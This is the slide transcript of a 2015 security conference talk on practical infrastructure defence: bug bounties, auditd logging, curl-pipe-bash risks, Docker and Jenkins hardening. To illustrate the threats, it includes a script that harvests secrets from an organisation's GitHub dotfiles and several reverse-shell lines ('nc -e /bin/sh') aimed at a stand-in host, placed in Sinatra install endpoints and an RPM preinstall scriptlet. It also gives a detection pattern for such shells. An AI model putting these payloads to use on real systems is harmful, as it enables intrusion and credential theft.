Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security for non-Unicorns!

Avatar for Bea Hughes Bea Hughes
October 22, 2015
1.8k

Security for non-Unicorns!

LASCON 2015

Security for the rest of us.

Avatar for Bea Hughes

Bea Hughes

October 22, 2015
Tweet

More Decks by Bea Hughes

Transcript

  1. PETE ALREADY GAVE MY TALK AS A KEYNOTE ): 2

    — @benjammingh for LasCon 2015
  2. WHO'S THIS CLOWN? 2 ▸ Infrastructure security at Etsy. ▸

    Recovered operations monkey at Puppet Labs. ▸ Own a lot of black t-shirts. ▸ Had 1300 accounts on his high school Linux system. (: 2 https://twitter.com/skullmandible/status/411281851131523072 3 — @benjammingh for LasCon 2015
  3. SETLIST ▸ Intros. (you are here). ▸ Frame the problem,

    why am I here. ▸ Things from the real world(™) & how to cope. ▸ Far far too many summaries. ▸ Wings, moonshine and dancing? (I have no idea) 4 — @benjammingh for LasCon 2015
  4. FROM TINY SEEDS, DO MIGHTY ACORNS GROW. ▸ PinkiePwn's 6

    tiny bugs in Chrome to full sandbox escape. ▸ Egor Homakov's 5 small bugs in Github to full private access on GitHub. ▸ XSS to remote code execution in under an hour. ▸ Username & password from HVAC system leads to 8 — @benjammingh for LasCon 2015
  5. COMPUTERISING IS HARD. No. 1 takeaway for security types is

    a sense of perspective. (maybe even humility! gasp) 10 — @benjammingh for LasCon 2015
  6. SECURITY PEOPLE AREN'T GREAT SECURE CODERS. ▸ Snort: 10 CVEs,

    Wireshark: 322! CVEs ▸ Security Firm Bit9 Hacked, Used to Spread Malware ▸ Joxean Koret on Breaking Antivurius software ▸ Tavis from Project Zero on exploiting ESET ▸ BEST! FireEye just running Apache/PHP as root ! 11 — @benjammingh for LasCon 2015
  7. SO WHO DO I TRUST? ▸ No one? Always a

    great position for security people, who don't want to get paid. ▸ Everyone? Do I have some emails with funny cats for you to click on. ▸ Security vendors? If you have infinite money and no attackers. ▸ Attackers! 12 — @benjammingh for LasCon 2015
  8. "YOU'RE ALREADY BEING PROBED FOR SECURITY HOLES, DO YOU WANT

    TO KNOW OR NOT?" 13 — @benjammingh for LasCon 2015
  9. BUG BOUNTIES 103: THE FIRST FEW WEEKS WILL BE HELL.

    16 — @benjammingh for LasCon 2015
  10. terrible bash example (don't do this) # for i in

    $(curl --silent 'https://api.github.com/orgs/<target>/members' \ # | grep html_url | cut -f 4 -d '"' | cut -d / -f 4); \ # do ( curl --silent https://api.github.com/repos/$i/dotfiles | grep -q 'Not Found' || \ # git clone https://github.com/$i/dotfiles.git $i ) \ # ; done for i in * ; do [ -d "$i/.git" ] || continue cd $i for revision in $(git rev-list --all) ; do unset PAGER export GIT_PAGER="" # find . -iname \*.key -or -iname \*.pem out="$(git grep -i -E "$1" ${revision} )" if [ $? -eq 0 ] ; then echo "${out}" | LANG="C" sed "s/^/$i: /" fi done cd .. done 26 — @benjammingh for LasCon 2015
  11. AUDITD Auditd is the best way to get command execution

    logged in your infrastructure. 29 — @benjammingh for LasCon 2015
  12. AUDITD Auditd is the worst way to get this information

    to a log file. type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000.... typde=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl" type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax" type=PATH msg=audit(123:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 type=PATH msg=audit(123:3020171): item=1 name=(null) inode=200983 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 type=PATH msg=audit(123:3020171): item=2 name=(null) inode=46 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 30 — @benjammingh for LasCon 2015
  13. WHY? "Why are the logs multiline?" -- David Shing, aka

    "Shingy", aka "The Shing", aka "AOL's 32 — @benjammingh for LasCon 2015
  14. MULTILINE LOGS ARE THE SPAWN OF THE DEVIL ORACLE'S JAVA

    33 — @benjammingh for LasCon 2015
  15. COPING WITH MULTILINE AUDITD ▸ ELK: multiline filter in Logstash.

    ▸ Other: github/gdestuynder/Audisp-json ▸ Have cash, want a decent GUI (and more): Go use Threatstack! ▸ Write something yourself in python & golang: I keep promising to OSS this ): 34 — @benjammingh for LasCon 2015
  16. ALERT ON SKETCHY THINGS. (ASSUMES ELK) 1. Elastalert from Yelp

    2. Alert on "/bin/nc *-e /bin/sh*" 3. You will now find when someone tries to run a reverse shell! 4. Or when yours ops people do fun things. 35 — @benjammingh for LasCon 2015
  17. SINATRA EXAMPLE get '/install.sh' do if request.env['HTTP_USER_AGENT'] =~ /curl/ return

    'nc -e /bin/sh root.legit.pw 2222 &' else return print_install_code() end end 39 — @benjammingh for LasCon 2015
  18. SINATRA EXAMPLE 2: PAYBACK get '/install.sh' do ip = request.env['HTTP_CLIENT_IP']

    if seen_before.include? ip return print_install_code() else seen_before << ip return 'nc -e /bin/sh root.legit.pw 2222 &' end end 40 — @benjammingh for LasCon 2015
  19. CURL | BASH "BUT THIS IS NO WORSE THAN PACKAGES."

    foo$ sudo yum install sketchy foo$ sudo aptitude install sketchy 43 — @benjammingh for LasCon 2015
  20. CURL | BASH "but worse than downloading RPMs from a

    random site?" foo$ rpm --verify --check-sigs sketchy.1.33-7.rpm foo$ dpkg-sig --verify sketchy.1.33-7.deb 44 — @benjammingh for LasCon 2015
  21. CURL | BASH root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet

    (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh root.legit.pw 2222 ;\ done' 45 — @benjammingh for LasCon 2015
  22. VERIFIABLE This doesn't exist: foo$ curl legit.pw/sketch.sh | sudo sh

    --gpg-verify No one has ever done this: foo$ curl legit.pw/sketch.sh | gpg --verify --output - | sudo sh 46 — @benjammingh for LasCon 2015
  23. CURL | BASH "But I trust HTTPS" ▸ HTTPS certs

    cost ~$6. ▸ If I can't make $6 by owning a system, I should probably stop being an attacker. ▸ @letsencrypt will soon make this free. 47 — @benjammingh for LasCon 2015
  24. >30% OF IMAGES IN DOCKER HUB CONTAIN HIGH PRIORITY SECURITY

    VULNS - JAYANTH GUMMARAJU, TARUN DESIKAN AND YOSHIO TURNER FROM BANYANOPS 59 — @benjammingh for LasCon 2015
  25. BUT IS DOCKER ITSELF SECURE? ▸ Don't run things as

    root. ▸ No really, stop running things as root. ▸ Did I mention not running things as root. ▸ It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) 63 — @benjammingh for LasCon 2015
  26. SECURIFY THE DOCKER. ▸ Don't use --privileged. ▸ Use --cap-drop

    all and --cap-drop <thing> to get the minimum capabilities. ▸ Use Docker Notary ▸ Use GRSecurity (just do that anyway, if you can.) ▸ Use SELinux... I may as well ask for a pony here. 64 — @benjammingh for LasCon 2015
  27. THREAT MODELLING FOR BEGINNERS 1. what are you actually defending

    against? 2. from whom? 3. for how much? 68 — @benjammingh for LasCon 2015
  28. <PINCH OF SALT GOES HERE> ▸ I am not saying

    Docker is ZOMG unhackable. ▸ it's just cgroups and namespacing. (just) ▸ Escapes will happen. ▸ They have a rad security team (Hi @diogomonica and @nathanmccauley) 70 — @benjammingh for LasCon 2015
  29. UNPINCHOFSALTD ▸ You can use it in a way that

    is secure, enough. ▸ network separation & segregation still works. ▸ secrets/credentials still a bigger problem. ▸ PLEASE don't just adopt it because it's new & shiny. ▸ ! " unikernels ✨ $ 71 — @benjammingh for LasCon 2015
  30. IT'S ENTIRE JOB IS TO TAKE ARBITRARY CODE AND RUN

    IT, WITH ACCESS TO SOME SECRET/CREDENTIAL DATA. 73 — @benjammingh for LasCon 2015
  31. OLD CRUFTY CONFIGS + ALL YOUR CODE & SECRETS 75

    — @benjammingh for LasCon 2015
  32. RCE as a service 6 6 Hacking Jenkins Servers With

    No Password 77 — @benjammingh for LasCon 2015
  33. MAKE JENKINS SUCK FEWER * DISABLE EXECUTION ON THE MASTER

    JENKINS HOST. * DISABLE ANONYMOUS ACCESS. * (USE TRAVIS, IF YOU CAN) 78 — @benjammingh for LasCon 2015
  34. BUT WHAT IF JENKINS COULD BE HARNESSED FOR GOOD? 79

    — @benjammingh for LasCon 2015
  35. NOT STOLEN FROM NickG's old 2012 deck. 7 7 Thanks

    Nick. nickgsuperstar/devopssec-apply-devops-principles-to-security 80 — @benjammingh for LasCon 2015
  36. JENKINS AS A FORCE FOR [SECURITY] GOOD ▸ Gauntlt "be

    mean to your code" ▸ https://github.com/secure-pipeline ▸ Even Adobe blog on secure software, zomg! 81 — @benjammingh for LasCon 2015
  37. SUMMARY ▸ Computers are apparently hard. ▸ Security is clearly

    harder still, obv. ▸ Actually trust and humans is hard. ▸ The typing is the easy bit. (ish) 84 — @benjammingh for LasCon 2015
  38. MORE SUMMARY ▸ Complex systems lead to much more complex

    security problems. (see Oauth) ▸ Annual pen-tests don't scale, bug bounties can help. ▸ Attackers are mining any public info you have (GitHub, S3, pastebin?) ▸ No really, go check all your S3 buckets... 85 — @benjammingh for LasCon 2015
  39. WILL THERE BE A SUMMARY OF SUMMARIES? ▸ I beg

    you to stop trusting curl. ▸ Auditd is awful, but it can be fewer awful. ▸ Jenkins, you probably have to have one. ▸ but that can be okay, nay, even useful for security. 86 — @benjammingh for LasCon 2015
  40. A SUMMARY APPEARED, WHAT HAPPENED NEXT WILL SHOCK YOU ▸

    Docker and security can be used in the same sentence. ▸ Understand your threat model (Apple's guide) ▸ Don't be a FireEye, stop running things as root. 87 — @benjammingh for LasCon 2015
  41. THANK YOU ▸ Twidder: @benjammingh ▸ LinkedIn: lnkdin.me/p/benyeah ▸ FidoNet:

    2:254/524.13 ▸ JitHub: github.com/barn ▸ SpeakerDeck: speakerdeck.com/barnbarn ▸ Etsy: Careers <--- CodeAsCraft <--- our blog 88 — @benjammingh for LasCon 2015